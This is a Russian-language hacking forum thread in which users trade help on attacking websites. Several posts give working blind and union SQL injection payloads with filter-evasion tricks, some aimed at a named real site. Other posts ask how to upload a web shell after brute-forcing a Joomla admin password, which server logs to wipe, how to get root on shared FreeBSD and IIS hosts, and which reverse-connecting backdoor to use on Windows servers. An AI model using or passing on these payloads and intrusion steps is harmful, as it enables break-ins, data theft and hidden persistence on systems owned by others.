Нашёл скул инъект. на .php?mod=1' выдает обычную You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1 на .php?mod=1'union/**/select/**/1/* пустую страницу на .php?mod=1'union/**/select/**/1,2, и т.д./* неверное количество полей Это и есть слепая инъекция?Никогда раньше не работал с blind инъектами Если да,то скажите пару слов про использование Bsqlbf или sqlmap
.php?mod=1'union/**/select/**/1/* пустую страницу а ты не пропустил ничего? .php?mod=1'/**/union/**/select/**/1/* пустую страницу
p.r0phe.t Я не понимаю, неужели нельзя сначала хоть что-то прочитать? Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией? А вот так что выдаёт? .php?mod=-1'/**/union/**/select/**/1/* А вот так? .php?mod=-1/**/union/**/select/**/1/* А вот так? .php?mod=1/**/union/**/select/**/1/* А вот так? .php?mod=1/**/union/**/select/**/1--+ А вот так? .php?mod=-1/**/union/**/select/**/1--+ А вот так? .php?mod=-1/**/and/**/1=1--+ А вот так? .php?mod=-1/**/and/**/1=2--+ Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?
А разве я не могу взять другую html`ку на саете, переправить под форму создания юзера и вызову функцию?
как себя обезопасить после проведения Sql inj. известно: система: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch version(): 5.1.22-rc-log есть login и хеш пароль roota к БД бручу... пока безуспешно. там висит JOOMLA пасс тоже пока в бруте. как залить шелл после того как я узнаю пасс? логи чистить эти? /var/log/httpd-error.log /var/log/httpd-access.log какие дальше действия?
Скуль от какого юзера бд? МОжет через неё легче прочитать пасс root'а где-нить в конфигах чем брутить.
p.r0phe.t 4 ветка, фильтрация пробелов, "+", "=". file_priv=n Если очень-очень нужно, то можно: http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/* подбираем таблицу: http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/* и дальше в этом-же ключе : http://forum.antichat.ru/threadnav35207-1-10.html Отличный способ от скуки
есть шелл на сервере ISS 6.0, на нем висит N пользователей и N сайтов этих пользователей,и у шелла права пользователя,можно ли как то вылезти из юзера? смд разумеется не работает.
подскажите... с помощью скули вида www.site.com/home.php?fid=8+and+1=2+union+select+1=user(),2,3+--+ выдернул все названия бд,таблиц и столбцов. Теперь хочу узнать столбцы из таблицы users. Узнал тока столбец id. 1) возможно ли узнать как то остальные названия кроме брута (брутить почему-то не получается) 2) кавычки совать нельзя. можно ли в where хешить само условие?
union select column_name from information_schema.columns where table_name=0x7573657273 limit 0,1 где 7573657273 users..а вообще читай статьи..это так трудно?
Есть похапе-шелл и возможность компилить локальным юзером на FreeBSD 6.3-RELEASE-p11. На машине еще около двухста юзеров, MySql (5.0.75) и Апач. Как поднять права до рута? Как можно посмотреть содержимое директорий соседа?
а не проще так? http://apsite.ru/x/popup.php?mod=1'/**/union/**/select/**/1/**/from/**/admin/* результат тот же.. Но,если таблица будет правильная,всё равно будет пустой экран. Поправь если что. http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/* А какой смысл этого запроса,если все равно экран пустой?
Знаю что не по теме но все таки... Посоветуйте какой нибуть бек дор (системный продукт) для удаленного упр. сервера (предположительно стоит windows 2003/2008) Главный функционал -> командная строка (телнет чтоли называется) либо отстук куда нибуть (т.е. чтобы зараж. машина брала cmd команды с хоста моего) Знаю что много щас сущ. продуктов/бек доров но нужен стабильный продукт/бек дор (можно и палевный бек дор)
